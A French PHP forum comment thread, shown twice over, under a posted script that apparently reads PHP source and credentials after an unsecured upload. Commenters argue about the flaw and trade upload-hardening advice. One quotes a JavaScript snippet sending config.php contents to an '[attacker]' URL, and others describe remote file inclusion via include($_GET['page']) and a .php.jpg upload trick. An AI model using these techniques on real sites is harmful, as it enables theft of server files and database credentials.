cs_zzzzzz
Messages postés408Date d'inscriptionlundi 16 décembre 2002StatutMembreDernière intervention18 décembre 2012
-
18 avril 2004 à 15:51
Shinikaka
Messages postés4Date d'inscriptiondimanche 3 juin 2007StatutMembreDernière intervention 2 février 2012
-
2 déc. 2010 à 14:08
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.
Shinikaka
Messages postés4Date d'inscriptiondimanche 3 juin 2007StatutMembreDernière intervention 2 février 2012 2 déc. 2010 à 14:08
Solution la plus efficace pour vous protéger (upload de fichier je parle)
Comme l'a dit renaud288 en 2004 :
- addslashes dans les post et get
- parser le contenu du fichier (pas obligatoire...) pour y trouver un code php
L'ultime solution :
- Renommer le fichier recu en quelque chose . extension obligatoire
exemple :
j'upload script.php
La page qui analyse et traite l'upload le renomme en asdj012.png
TOUJOURS RENOMMER PAR L'EXTENSSION DESIREE ! et voila vous êtes protégé... mais jamais a 100%
Shinikaka
Messages postés4Date d'inscriptiondimanche 3 juin 2007StatutMembreDernière intervention 2 février 2012 2 déc. 2010 à 14:02
Pour ceux qui ont suivis le sujet de discussion ...
Même si tu n'autorise que des fichier .jpg, ou .png, bref des images, il y a des façons de contourner cette protection.
Les vrais complèterons la suite : nu**b**e ... le truc avec un % :) voyez ?
Je ne voudrais pas être plus explicite.
Si vous savez de quoi je parle, vous n'avez rien a faire ici et connaissez ces méthodes de contournement.
Si vous ne savez pas de quoi je parle, ce script pourrait ne jamais vous être utile, donc vous n'avez rien a faire ici non plus :)
Steph448
Messages postés1Date d'inscriptionsamedi 8 août 2009StatutMembreDernière intervention 8 août 2009 8 août 2009 à 06:08
xD je ne mis connais pas super bien en ordi, vous pouvez l'expliquer en français san le langage ordi?
NKWolf
Messages postés38Date d'inscriptionsamedi 28 août 2004StatutMembreDernière intervention11 janvier 2007 4 juin 2006 à 13:11
bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code
sinon GG ;)
NKWolf
Messages postés38Date d'inscriptionsamedi 28 août 2004StatutMembreDernière intervention11 janvier 2007 4 juin 2006 à 13:11
bon code, mais manque un peux de commentaire pour les novices, c'est pour ca que je met que 8, car des commentaire permette une meilleur lecture et compréhention du code
sinon GG ;)
cs_guismo1er
Messages postés76Date d'inscriptionvendredi 21 mars 2003StatutMembreDernière intervention12 mars 2009 7 avril 2006 à 17:15
avez vous des idées?
cs_guismo1er
Messages postés76Date d'inscriptionvendredi 21 mars 2003StatutMembreDernière intervention12 mars 2009 28 mars 2006 à 18:24
Vraiment pas mal cette source, ce serait gentil de nous donner des astuces pour protéger des fichiers lors de l'upload, car ca m'interessrerai bcp :)
Merci à vous :)
alex1025
Messages postés104Date d'inscriptionmardi 17 février 2004StatutMembreDernière intervention 8 décembre 2007 12 févr. 2006 à 13:57
si on met un htacces dans le rep ou arrive l image il n'y a plus de soucis non?
kankrelune
Messages postés1293Date d'inscriptionmardi 9 novembre 2004StatutMembreDernière intervention21 mai 2015 6 janv. 2005 à 11:24
hé coeur_enf(flammé ça doit etre pour ça... :oD)... .. .
Tu fais comment pour combler une faille de sécurité si t'en entend pas parler... anaha ??? .. . :oP
Et en attendant si tu sais lire la moitié des posteurs on parlés de failles de sécu exploitable sans en donner la façon de l'exploiter... .. .
Et faire un whois de phpcs... mais ça t'avance à quoi... t'a quel age... .. ?
O_o
Il n'y a rien d'illégale dans cette page... va sur les sites de microsoft, de phpnuke, etc... les failles y sont déclarées publiquement dès qu'elles sont trouvées... et heureusement... ça permet de prendre les mesures adéquates pour les combler... .. .
Allez avoue coeur_enf ça t'ennerve parce que tu as peut etre la faille et que personne ici ne donne de code tout fait pour la combler... Alors arrete de pousser mémé dans les orties... .. . ;o)
Pour le reste je serais interessé si quelqu'un à un lien interessant à me conseiller sur la sécurisation du php et sur les points 2, 3 et 4 que vient d'évoquer renaud288... de préference en français si c'est pô trop demander... bien que le site auquel je pense ne présente guere de faille de se genre (le visiteur peut juste lire... pas d'upload, pas de forum et pas encore de guestbook... peut toujours s'accrocher... :oD) ça pourra m'être quand même utile et etre utile à du monde... .. .
^_^
@ tchaOo°
renaud288
Messages postés8Date d'inscriptionjeudi 26 février 2004StatutMembreDernière intervention13 décembre 2004 29 nov. 2004 à 16:55
Petit commentaire rapide. La faille est connue depuis longtemps.... c'est pas une faille PHP...
T'aurais pu être simpa avec les internautes en donnant des données pour résoudre le pb:
1- le problème est à l'upload de fichier via HTML (postage de fichier).
2- Sécuriser la récupération: test de l'extention... (selon le type de serveur (n'oubliez pas les extentions asp etc si votre serveur interprète plusieurs langauges...)
3- parsage du fichier uploadé: contient il du code php, asp etc...
4- ne pas oublier d'ajouter la fonction addslashes a vos données post ou get (il est possible du mettre du code PHP dedans... avec les b ons guillements, les OR et les fonctions php.
5- ne pas déplacer le fichier du rep tmp avant d'être sur
6- effacer le fichier du dossier tmp
7- si votre hébergeur le permet: ne pas mettre le fichier tmp ou équivalent dans la racine... (si les codes du hacker sont bien faits, il peut exécuter le fichier avant qu'il ne soit supprimé de disque
8- Penser aussi à parser d'autres extentions... attention virus, programme de prise de contrôle sur le serveur etc...
Bonne prog à tous et merci aux programmeurs qui mettent en évidence les failles (ou du moins les expliquent aux débutants)
cs_stal
Messages postés2Date d'inscriptionlundi 30 août 2004StatutMembreDernière intervention 9 septembre 2004 30 août 2004 à 18:27
tu n'as pas un lien de telechargement ?
skotmarud
Messages postés116Date d'inscriptionsamedi 5 avril 2003StatutMembreDernière intervention26 janvier 2008 19 juin 2004 à 03:25
.txt :X
cs_Kirua
Messages postés3006Date d'inscriptiondimanche 14 avril 2002StatutMembreDernière intervention31 décembre 2008 10 juin 2004 à 14:44
extrait du texte de présentation de ce code (que tu n'as pas lu):
Explication finale :
---------------------------------------
La securité avant tout!
alors quoi?
psyjc
Messages postés182Date d'inscriptiondimanche 29 juin 2003StatutMembreDernière intervention18 avril 2008 10 juin 2004 à 13:49
Mdrrr!
en attendant tu n'a pas du lire ce que j'ai ecrit plus haut..
bref. j'arrette de perdre du temps sur ce fil..
-=|[titiplusplus]|=-
Messages postés28Date d'inscriptionvendredi 7 novembre 2003StatutMembreDernière intervention19 avril 2004 10 juin 2004 à 12:49
loOl ... et apres ?
Pour moi ca incite en rien du tout ce code, mdr.
Tu voulais nous faire partager ta découverte du whois ?
hihihi
cs_ceced
Messages postés70Date d'inscriptionlundi 12 mai 2003StatutMembreDernière intervention11 mai 2005 6 juin 2004 à 20:07
coeur_enf j'ai envie de te dire juste vie ta vie, et bosse pour ta geule!
no comment!
psyjc
Messages postés182Date d'inscriptiondimanche 29 juin 2003StatutMembreDernière intervention18 avril 2008 6 juin 2004 à 19:13
il y a une (petite) charte juste là, qui dit je cite : "Merci également de veiller à ne pas trop écorcher la langue de molière en écrivant en abrégé (comme sur des SMS)."
alors commence par lire ca, et puis tant que t'y est, tu peux aussi lire les commentaires au dessus avant de dire de la merde...
cs_Kirua
Messages postés3006Date d'inscriptiondimanche 14 avril 2002StatutMembreDernière intervention31 décembre 2008 6 juin 2004 à 19:05
ça fait 24h que t'es inscrit sur le site et t'es déjà agressif, éh béh...
ceci dit, suis assez d'accord avec toi sur le fait que ce code porte bien mal ce nom, mais vraiment pas d'accord avec le fait que tu prennes à parti toute la click qui a commenté ici en ayant manifestement pas lu les commentaires.
cs_coeur_enf
Messages postés1Date d'inscriptionsamedi 5 juin 2004StatutMembreDernière intervention 6 juin 2004 6 juin 2004 à 19:03
tu va t'atker a des noob, ki essai d'aprendre le php, et ki on pe de finance
moi je te le dis, atk toi a un mome de 5 an dans la rue, c'est la meme chose !!!!
je rigole kan je vois des bouffon come ca !!!!
je pense ke si vou aviez + de cervel, vou ferriez une explication pour ke les noob sache ce proteger !!!
la je dirai bravo !
pgpp
Messages postés58Date d'inscriptiondimanche 16 mai 2004StatutMembreDernière intervention 2 septembre 2004 16 mai 2004 à 23:17
salut!
Juste pour dire que je suis d'accord avec koko, il existe une solution plus que simple pour faire exécuter du php via une faille include.
Alors protégez vous bien comme le dit apxa !
apxa
Messages postés188Date d'inscriptionmercredi 15 mai 2002StatutMembreDernière intervention25 avril 2009 28 avril 2004 à 10:36
Re salut,
je vais peut etre me repeter mais je pense que si tu veux palier ce genre de faille ,il y a plusieurs solutions :
- soit tu passes par un htaccess avec des controles sur l'host appelant le fichier. (apach only)
- soit tu met php en mode safe on avec des refus d'execution de commandes sensibles (apache ou iis)
- soit tu parses via php le path du fichier afin de recuperer l'host et ainsi comparer avec l'host du serveur pour s'assurer que le fichier executer se trouve bien sur le serveur et non un serveur distant.
- soit tu fais ton site en html et tu fais pas chié le monde avec des failles de newbee (amicalement) ;)
Have Fun.
testetrtr
Messages postés20Date d'inscriptionmercredi 14 mai 2003StatutMembreDernière intervention 5 juin 2006 27 avril 2004 à 18:41
ok j'ai trouver le prob de la securiter de ce script.
je vais le dire a son proprio.
pour qu'il corrige son script.
pour psyjc (y a quoi comme astuce pour tester la securiter d'un code php , )? astuce comme celle que t'a tester sur ce script.
tu peux me repondre par mail si tu veux.
psyjc
Messages postés182Date d'inscriptiondimanche 29 juin 2003StatutMembreDernière intervention18 avril 2008 27 avril 2004 à 18:33
bah va voir sur ton site :)
dans les derniers uploads : testX.php.jpg
execution de code js au travers dimages (sur IE)
tu devrais verifier le type mime en plus de l'extension de fichier avant d'accepter l'upload d'une image.
testetrtr
Messages postés20Date d'inscriptionmercredi 14 mai 2003StatutMembreDernière intervention 5 juin 2006 27 avril 2004 à 18:25
desolais mais le script d'upload n'est pas de moi.
je l'utilise juste pour dennee des exemple comme ici , c'est tous.
si nan explique ton idee de securite de se script.
c'est tj interessant a savoire.
psyjc
Messages postés182Date d'inscriptiondimanche 29 juin 2003StatutMembreDernière intervention18 avril 2008 27 avril 2004 à 16:25
daccord avec testetrtr, la source est bof bof!
mais ton script d'upload aussi ;)
tu devrais revoir la securité de ton upload...
testetrtr
Messages postés20Date d'inscriptionmercredi 14 mai 2003StatutMembreDernière intervention 5 juin 2006 23 avril 2004 à 18:21
deoler les gas mes cette source n'est pas vraimment ce que je vais califier de exelent .
pour ma note sa cera 3 a 4 sur 10.
pour quoi parceque c'est facile de dree une source plus complette que celle la qui donne l'oportuniter d'uploader sur le serveur que vous avec penetrer . et aussi d'executer des commandes shell et des php.
ce pandant c'est un script qui est lier au pirage , c'est pour ca que je vais vous metre qu'une capture d'ecrant de mon script.
Samiby
Messages postés118Date d'inscriptionmercredi 26 novembre 2003StatutMembreDernière intervention 2 janvier 2006 19 avril 2004 à 17:28
Ca marche, mais il faut avoir vu le phpinfo() du site, ce qui n'est pas donné à tout le monde
-=|[titiplusplus]|=-
Messages postés28Date d'inscriptionvendredi 7 novembre 2003StatutMembreDernière intervention19 avril 2004 19 avril 2004 à 17:22
En tout cas mon truc plus haut marche !
C'est du XSS ( Cross Site Scripting pour ceux qui ne connaissent pas).
Le plus dur est de faire doublecliquer l'admin dessus ... hehe ...
@+
cs_koko
Messages postés654Date d'inscriptionlundi 14 janvier 2002StatutMembreDernière intervention20 février 2005 19 avril 2004 à 17:19
faut une faille de type include !
et j'ai pas envie de chercher des failles include sur php nuke...
-=|[titiplusplus]|=-
Messages postés28Date d'inscriptionvendredi 7 novembre 2003StatutMembreDernière intervention19 avril 2004 19 avril 2004 à 17:06
hihi ... mdr
>et c'est tres facile a le faire (je l'ai déjà fait !) mais je dis pas comment ...
J'adore cette phrase !
Hihihi ...
Hé bien moi je te donne un défis alors !
Pour prouver ta bonne fois je t'authorise à me donner le contenu de mon index.php de mon site loOl.
cs_Kirua
Messages postés3006Date d'inscriptiondimanche 14 avril 2002StatutMembreDernière intervention31 décembre 2008 19 avril 2004 à 16:58
ce n'est pas une faille, c'est une imprudence. les créateurs de PHP ne sont pas raisonnable de la connerie des gens. qd tu laisses au visiteur la possibilité de placer ses fichiers personnels sur ton serveur FTP, tu prends tes dispositions, basta. je trouve qu'on ne peut pas appeler ça une faille.
Samiby
Messages postés118Date d'inscriptionmercredi 26 novembre 2003StatutMembreDernière intervention 2 janvier 2006 19 avril 2004 à 16:42
Il y a déjà eu des imbéciles qui ne surveillent pas l'upload sur leur site ?
Il faut être vraiment débile.
C'est sûr que à partir du moment où tu peux uploader n'importe quel fichier chez quelqu'un, tu peux faire n'importe quoi.
cs_koko
Messages postés654Date d'inscriptionlundi 14 janvier 2002StatutMembreDernière intervention20 février 2005 19 avril 2004 à 16:31
alors je vais expliquer (pas la faille mais bon)
il y a un site qui n'est pas a moi (on va dire phpcs pour que vous compreniez mais il n'y a pas cette faille)
et que dans include.php il y ai : include($_GET['page']);
la page script.php sera exécutée comme du php !!!
MAIS ca ne marchera pas a la base si vous utilisez un serveur apache par exemple.
Car le php est interpreté coté serveur
donc la page sera exécutée sur monsite !!
MAIS BIS il y a moyen que le code soit exécuter sur le serveur phpcs !!!
et c'est tres facile a le faire (je l'ai déjà fait !) mais je dis pas comment, je veux pas que des gamins s'amusent avec ca...
apxa
Messages postés188Date d'inscriptionmercredi 15 mai 2002StatutMembreDernière intervention25 avril 2009 19 avril 2004 à 11:30
salut,
c pas une faille mais je dirais plutot un mauvais parametrage de php.ini.
il suffit de mettre php en mode safe et le tour est joue.
sans compté que php.ini permet le refus de certaine commandes dites "sensibles" telque system() ou readfile().
ceci dit comme d'hab la majorité des hacking est souvent du a une mauvaise administration du site, de même pour un developpement.
Have Fun
-=|[titiplusplus]|=-
Messages postés28Date d'inscriptionvendredi 7 novembre 2003StatutMembreDernière intervention19 avril 2004 19 avril 2004 à 10:52
Le full patch que j'écris ... loOl ... mdr ... non excusez-moi ... hihi ... c pas le "full patch" mais le "fullpath".
-=|[titiplusplus]|=-
Messages postés28Date d'inscriptionvendredi 7 novembre 2003StatutMembreDernière intervention19 avril 2004 19 avril 2004 à 10:48
Après ma petite enquête ... tout le monde à raison.
Et donc, koko aussi !!!
Juste que koko a oublié de préciser que le fichier malveillant doit être visualisé par l'admin du site en local !
En plus pour écrire ce script il doit avoir le full patch du fichier dont il veut la source :-P
Si on a le path complet et que le webmaster visite une page contenant ce script :
---------------------------------------------------------------------------
<script>
dafile=window.open('/home/httpd/public_html/config.php');
window.open('http://[attacker]/file.php?'+dafile.document.body.innerText);
</script>
---------------------------------------------------------------------------
depuis l'ordinateur dans lequel se trouve le site, il renverra la source du fichier config.php au fichier
http://[attacker]/file.php, qui enregistrera l'information d'une façon ou d'une autre.
Voilou ;-)
cs_ceced
Messages postés70Date d'inscriptionlundi 12 mai 2003StatutMembreDernière intervention11 mai 2005 19 avril 2004 à 10:14
tu peu obtenire les sources php sachant que php est invisible en affichant la source!
qd tu affiches la source dans un navigateur tu lis que l'html, rien d'autre!
relie la doc php :) (baseeeee)
cs_ceced
Messages postés70Date d'inscriptionlundi 12 mai 2003StatutMembreDernière intervention11 mai 2005 19 avril 2004 à 10:10
la faille et a l'upload garcon! (include), peut etre que tu trouvera le fichier, cofing.inc.php, mais tu pouras pas le lire, et si t arrive a uploadé mon fichier, t'obitendra les codes, (si y a pas d'otre faille), mais c'est une faille que bcp utilise surement! croi moi lol c belle et bien une faille!
bin si non dit moi comment tu recupere un code sans une source de cette maniere...
Y A PLusieur faille comme script kiddi, ect... mais celle ci ne fait pas parti d'un script kiddi :) (comme on l appelle)
Samiby
Messages postés118Date d'inscriptionmercredi 26 novembre 2003StatutMembreDernière intervention 2 janvier 2006 19 avril 2004 à 10:04
Maids donc, où est la faille ? Tu ne peux rien obtenir par ce code, si ce n'est ce que tu as en faisant 'afficher la source' dans ton navigateur.
cs_ceced
Messages postés70Date d'inscriptionlundi 12 mai 2003StatutMembreDernière intervention11 mai 2005 19 avril 2004 à 09:56
Mais evidement sinon php serai interdit!
Samiby
Messages postés118Date d'inscriptionmercredi 26 novembre 2003StatutMembreDernière intervention 2 janvier 2006 19 avril 2004 à 09:54
de tout de façon, qui n'a pas le code d'accès au FTP, n'as le droit de lire les fichiers. Il ne peut les lire qu'au travers du navigateur, sous forme de HTML. il me semble que les fichiers sont protégés contre la lecture non autorisée chez tous les hébergeurs.
cs_ceced
Messages postés70Date d'inscriptionlundi 12 mai 2003StatutMembreDernière intervention11 mai 2005 19 avril 2004 à 09:51
Là le résultat sera uniquement au mieux du html !!!
Tu ne peux pas avoir la source d'un php distant comme ca !
A moins de configurer tonsite.com comme il faut pour le faire !!!
Et ca c'est plutot utopique, non ?
-=|[titiplusplus]|=-
Messages postés28Date d'inscriptionvendredi 7 novembre 2003StatutMembreDernière intervention19 avril 2004 19 avril 2004 à 08:34
oui mais en général sur chez un hébergeur, on a seulement accès son répertoire et non celui des autres ... le seule moyen d'utiliser ce script reste de trouver un site qui authorise l'upload sauvage ... hihi.
Et ce qui serait intéressant c'est de rechercher la racine du site :
<?
ex :
$dir='.';
while (is_dir($dir))
{
$dir.='../';
}
?>
Ou un truc dans le genre ...
cs_koko
Messages postés654Date d'inscriptionlundi 14 janvier 2002StatutMembreDernière intervention20 février 2005 19 avril 2004 à 08:11
mais alors l'utilité de cette source si le webmaster prend ses dispositions ?
c'était juste que je disais qu'il y avait comme meme moyen de le faire :)
cs_Kirua
Messages postés3006Date d'inscriptiondimanche 14 avril 2002StatutMembreDernière intervention31 décembre 2008 19 avril 2004 à 07:39
bah Koko, y a pas moyen si le webmaster prend ses dispositions, voilà tout. C'est comme ça pour tous les points sensibles :-)
cs_koko
Messages postés654Date d'inscriptionlundi 14 janvier 2002StatutMembreDernière intervention20 février 2005 19 avril 2004 à 07:34
cs_ceced
Messages postés70Date d'inscriptionlundi 12 mai 2003StatutMembreDernière intervention11 mai 2005 19 avril 2004 à 00:14
Le principe est simple, cela marche seulement coté serveur, et comme tous le monde sais, il faut, réussir, a uploader se fichier, pour recuperer les login et passe grace a ce script ...(cela peut etre sql, lhost, ftp, ect..) Donc en gros, si le webmaster n'a pas securisé l'upload de fichier en surveillant les extentions, .php, ou autre, risque et perile pour lui!
Donc si tu sais ou le fichier de la source que j ai mi se trouve, il te fau tous simplement, executé le script, cad: http://www.victime.com/photos/code.php
ca ne marchera pas et si ca marcherai il n'y aurai plus du php :p...!
J'ai essayé pour wanadoo car wanadoo a une faille enorme fo l'exploité, je ne la donnerai pas ici...
VOILA le but de se script et de lire toute les source extention php dans tous les rep/
de plus il t enregistre sous le nom code.own donc t source des pages recupéré par le script tu peux soi les telecharger, soi les voir directement via l 'url (voir lien show source) possibilité d affiché les code en couleur
Voir aussi fonction showsource("page") si tu veu t amusé...
Voilou..
cs_zzzzzz
Messages postés408Date d'inscriptionlundi 16 décembre 2002StatutMembreDernière intervention18 décembre 2012 18 avril 2004 à 23:04
Par contre tu pourrai détailler le principe de l'exploit car je n'ai pas comprit le principe (:p) merci.
cs_ceced
Messages postés70Date d'inscriptionlundi 12 mai 2003StatutMembreDernière intervention11 mai 2005 18 avril 2004 à 22:21
merci bien, lol, mais le but qd meme et pour dir la securité avant tout!
et tempis pour se qu'ils ont cette faille et qu'il ne la securise pas! faute du webmaster et non de la faille...
OverDarck
Messages postés116Date d'inscriptionjeudi 12 juillet 2001StatutMembreDernière intervention23 juin 2005 18 avril 2004 à 19:59
Tout simplement exelent, d'une simplicitée certaine, mais d'une puissance extraordinaire !!!!
Merci bien !
cs_zzzzzz
Messages postés408Date d'inscriptionlundi 16 décembre 2002StatutMembreDernière intervention18 décembre 2012 18 avril 2004 à 15:51
Qui a mit 1/10 ? n'importe quoi c'est pas prk c marqué exploit qu'il faut marquer directement 1/10. moi je te remercie pour ta source et je met 10/10 por compenser, @+
2 déc. 2010 à 14:08
Comme l'a dit renaud288 en 2004 :
- addslashes dans les post et get
- parser le contenu du fichier (pas obligatoire...) pour y trouver un code php
L'ultime solution :
- Renommer le fichier recu en quelque chose . extension obligatoire
exemple :
j'upload script.php
La page qui analyse et traite l'upload le renomme en asdj012.png
TOUJOURS RENOMMER PAR L'EXTENSSION DESIREE ! et voila vous êtes protégé... mais jamais a 100%
2 déc. 2010 à 14:02
Même si tu n'autorise que des fichier .jpg, ou .png, bref des images, il y a des façons de contourner cette protection.
Les vrais complèterons la suite : nu**b**e ... le truc avec un % :) voyez ?
Je ne voudrais pas être plus explicite.
Si vous savez de quoi je parle, vous n'avez rien a faire ici et connaissez ces méthodes de contournement.
Si vous ne savez pas de quoi je parle, ce script pourrait ne jamais vous être utile, donc vous n'avez rien a faire ici non plus :)
8 août 2009 à 06:08
4 juin 2006 à 13:11
sinon GG ;)
4 juin 2006 à 13:11
sinon GG ;)
7 avril 2006 à 17:15
28 mars 2006 à 18:24
Merci à vous :)
12 févr. 2006 à 13:57
6 janv. 2005 à 11:24
Tu fais comment pour combler une faille de sécurité si t'en entend pas parler... anaha ??? .. . :oP
Et en attendant si tu sais lire la moitié des posteurs on parlés de failles de sécu exploitable sans en donner la façon de l'exploiter... .. .
Et faire un whois de phpcs... mais ça t'avance à quoi... t'a quel age... .. ?
O_o
Il n'y a rien d'illégale dans cette page... va sur les sites de microsoft, de phpnuke, etc... les failles y sont déclarées publiquement dès qu'elles sont trouvées... et heureusement... ça permet de prendre les mesures adéquates pour les combler... .. .
Allez avoue coeur_enf ça t'ennerve parce que tu as peut etre la faille et que personne ici ne donne de code tout fait pour la combler... Alors arrete de pousser mémé dans les orties... .. . ;o)
Pour le reste je serais interessé si quelqu'un à un lien interessant à me conseiller sur la sécurisation du php et sur les points 2, 3 et 4 que vient d'évoquer renaud288... de préference en français si c'est pô trop demander... bien que le site auquel je pense ne présente guere de faille de se genre (le visiteur peut juste lire... pas d'upload, pas de forum et pas encore de guestbook... peut toujours s'accrocher... :oD) ça pourra m'être quand même utile et etre utile à du monde... .. .
^_^
@ tchaOo°
29 nov. 2004 à 16:55
T'aurais pu être simpa avec les internautes en donnant des données pour résoudre le pb:
1- le problème est à l'upload de fichier via HTML (postage de fichier).
2- Sécuriser la récupération: test de l'extention... (selon le type de serveur (n'oubliez pas les extentions asp etc si votre serveur interprète plusieurs langauges...)
3- parsage du fichier uploadé: contient il du code php, asp etc...
4- ne pas oublier d'ajouter la fonction addslashes a vos données post ou get (il est possible du mettre du code PHP dedans... avec les b ons guillements, les OR et les fonctions php.
5- ne pas déplacer le fichier du rep tmp avant d'être sur
6- effacer le fichier du dossier tmp
7- si votre hébergeur le permet: ne pas mettre le fichier tmp ou équivalent dans la racine... (si les codes du hacker sont bien faits, il peut exécuter le fichier avant qu'il ne soit supprimé de disque
8- Penser aussi à parser d'autres extentions... attention virus, programme de prise de contrôle sur le serveur etc...
Bonne prog à tous et merci aux programmeurs qui mettent en évidence les failles (ou du moins les expliquent aux débutants)
30 août 2004 à 18:27
19 juin 2004 à 03:25
10 juin 2004 à 14:44
Explication finale :
---------------------------------------
La securité avant tout!
alors quoi?
10 juin 2004 à 13:49
en attendant tu n'a pas du lire ce que j'ai ecrit plus haut..
bref. j'arrette de perdre du temps sur ce fil..
10 juin 2004 à 12:49
Pour moi ca incite en rien du tout ce code, mdr.
Tu voulais nous faire partager ta découverte du whois ?
hihihi
6 juin 2004 à 20:07
no comment!
6 juin 2004 à 19:13
alors commence par lire ca, et puis tant que t'y est, tu peux aussi lire les commentaires au dessus avant de dire de la merde...
6 juin 2004 à 19:05
ceci dit, suis assez d'accord avec toi sur le fait que ce code porte bien mal ce nom, mais vraiment pas d'accord avec le fait que tu prennes à parti toute la click qui a commenté ici en ayant manifestement pas lu les commentaires.
6 juin 2004 à 19:03
moi je te le dis, atk toi a un mome de 5 an dans la rue, c'est la meme chose !!!!
je rigole kan je vois des bouffon come ca !!!!
je pense ke si vou aviez + de cervel, vou ferriez une explication pour ke les noob sache ce proteger !!!
la je dirai bravo !
16 mai 2004 à 23:17
Juste pour dire que je suis d'accord avec koko, il existe une solution plus que simple pour faire exécuter du php via une faille include.
Alors protégez vous bien comme le dit apxa !
28 avril 2004 à 10:36
je vais peut etre me repeter mais je pense que si tu veux palier ce genre de faille ,il y a plusieurs solutions :
- soit tu passes par un htaccess avec des controles sur l'host appelant le fichier. (apach only)
- soit tu met php en mode safe on avec des refus d'execution de commandes sensibles (apache ou iis)
- soit tu parses via php le path du fichier afin de recuperer l'host et ainsi comparer avec l'host du serveur pour s'assurer que le fichier executer se trouve bien sur le serveur et non un serveur distant.
- soit tu fais ton site en html et tu fais pas chié le monde avec des failles de newbee (amicalement) ;)
Have Fun.
27 avril 2004 à 18:41
je vais le dire a son proprio.
pour qu'il corrige son script.
pour psyjc (y a quoi comme astuce pour tester la securiter d'un code php , )? astuce comme celle que t'a tester sur ce script.
tu peux me repondre par mail si tu veux.
27 avril 2004 à 18:33
dans les derniers uploads : testX.php.jpg
execution de code js au travers dimages (sur IE)
tu devrais verifier le type mime en plus de l'extension de fichier avant d'accepter l'upload d'une image.
27 avril 2004 à 18:25
je l'utilise juste pour dennee des exemple comme ici , c'est tous.
si nan explique ton idee de securite de se script.
c'est tj interessant a savoire.
27 avril 2004 à 16:25
mais ton script d'upload aussi ;)
tu devrais revoir la securité de ton upload...
23 avril 2004 à 18:21
pour ma note sa cera 3 a 4 sur 10.
pour quoi parceque c'est facile de dree une source plus complette que celle la qui donne l'oportuniter d'uploader sur le serveur que vous avec penetrer . et aussi d'executer des commandes shell et des php.
ce pandant c'est un script qui est lier au pirage , c'est pour ca que je vais vous metre qu'une capture d'ecrant de mon script.
( je l'ai tester sur mon serveur,).
http://lux0r.projektas.lt/do_upload.php
19 avril 2004 à 17:28
19 avril 2004 à 17:22
C'est du XSS ( Cross Site Scripting pour ceux qui ne connaissent pas).
Le plus dur est de faire doublecliquer l'admin dessus ... hehe ...
@+
19 avril 2004 à 17:19
et j'ai pas envie de chercher des failles include sur php nuke...
19 avril 2004 à 17:06
>et c'est tres facile a le faire (je l'ai déjà fait !) mais je dis pas comment ...
J'adore cette phrase !
Hihihi ...
Hé bien moi je te donne un défis alors !
Pour prouver ta bonne fois je t'authorise à me donner le contenu de mon index.php de mon site loOl.
Voici l'adresse : http://ebc.titiplusplus.com/index.php
Aller sans rancune ;-)
19 avril 2004 à 16:58
19 avril 2004 à 16:42
Il faut être vraiment débile.
C'est sûr que à partir du moment où tu peux uploader n'importe quel fichier chez quelqu'un, tu peux faire n'importe quoi.
19 avril 2004 à 16:31
il y a un site qui n'est pas a moi (on va dire phpcs pour que vous compreniez mais il n'y a pas cette faille)
si je fais :
http://www.phpcs.com/include.php?page=http://monsite/script.php
et que dans include.php il y ai : include($_GET['page']);
la page script.php sera exécutée comme du php !!!
MAIS ca ne marchera pas a la base si vous utilisez un serveur apache par exemple.
Car le php est interpreté coté serveur
donc la page sera exécutée sur monsite !!
MAIS BIS il y a moyen que le code soit exécuter sur le serveur phpcs !!!
et c'est tres facile a le faire (je l'ai déjà fait !) mais je dis pas comment, je veux pas que des gamins s'amusent avec ca...
19 avril 2004 à 11:30
c pas une faille mais je dirais plutot un mauvais parametrage de php.ini.
il suffit de mettre php en mode safe et le tour est joue.
sans compté que php.ini permet le refus de certaine commandes dites "sensibles" telque system() ou readfile().
ceci dit comme d'hab la majorité des hacking est souvent du a une mauvaise administration du site, de même pour un developpement.
Have Fun
19 avril 2004 à 10:52
19 avril 2004 à 10:48
Et donc, koko aussi !!!
Juste que koko a oublié de préciser que le fichier malveillant doit être visualisé par l'admin du site en local !
En plus pour écrire ce script il doit avoir le full patch du fichier dont il veut la source :-P
Voici l'extrait de http://www.phpsecure.info/v2/article/Phpinfo-Security.php :
Si on a le path complet et que le webmaster visite une page contenant ce script :
---------------------------------------------------------------------------
<script>
dafile=window.open('/home/httpd/public_html/config.php');
window.open('http://[attacker]/file.php?'+dafile.document.body.innerText);
</script>
---------------------------------------------------------------------------
depuis l'ordinateur dans lequel se trouve le site, il renverra la source du fichier config.php au fichier
http://[attacker]/file.php, qui enregistrera l'information d'une façon ou d'une autre.
Voilou ;-)
19 avril 2004 à 10:14
qd tu affiches la source dans un navigateur tu lis que l'html, rien d'autre!
relie la doc php :) (baseeeee)
19 avril 2004 à 10:10
bin si non dit moi comment tu recupere un code sans une source de cette maniere...
Y A PLusieur faille comme script kiddi, ect... mais celle ci ne fait pas parti d'un script kiddi :) (comme on l appelle)
19 avril 2004 à 10:04
19 avril 2004 à 09:56
19 avril 2004 à 09:54
19 avril 2004 à 09:51
1. KOKO SI TU ARRIVE TU AS DETRUIT PHP,
2.http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php a la limite tu peu fair un script java script pour recuperation ou volé les cookies c'est tous! mais pas executé un script coté distant !
19 avril 2004 à 08:38
http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php
Là le résultat sera uniquement au mieux du html !!!
Tu ne peux pas avoir la source d'un php distant comme ca !
A moins de configurer tonsite.com comme il faut pour le faire !!!
Et ca c'est plutot utopique, non ?
19 avril 2004 à 08:34
Et ce qui serait intéressant c'est de rechercher la racine du site :
<?
ex :
$dir='.';
while (is_dir($dir))
{
$dir.='../';
}
?>
Ou un truc dans le genre ...
19 avril 2004 à 08:11
c'était juste que je disais qu'il y avait comme meme moyen de le faire :)
19 avril 2004 à 07:39
19 avril 2004 à 07:34
il y a moyen tout de meme ^^
mais je dirais pas comment
19 avril 2004 à 00:14
Donc si tu sais ou le fichier de la source que j ai mi se trouve, il te fau tous simplement, executé le script, cad: http://www.victime.com/photos/code.php
enfait on s'est tous que les pages, config.inc.php ou autre dont la majorité utilise le nom de c page, dedans se trouve les connexions, cad, host, pass, login d'autre par tu sais que tu ne peu pas executé se script comme http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php
ca ne marchera pas et si ca marcherai il n'y aurai plus du php :p...!
J'ai essayé pour wanadoo car wanadoo a une faille enorme fo l'exploité, je ne la donnerai pas ici...
VOILA le but de se script et de lire toute les source extention php dans tous les rep/
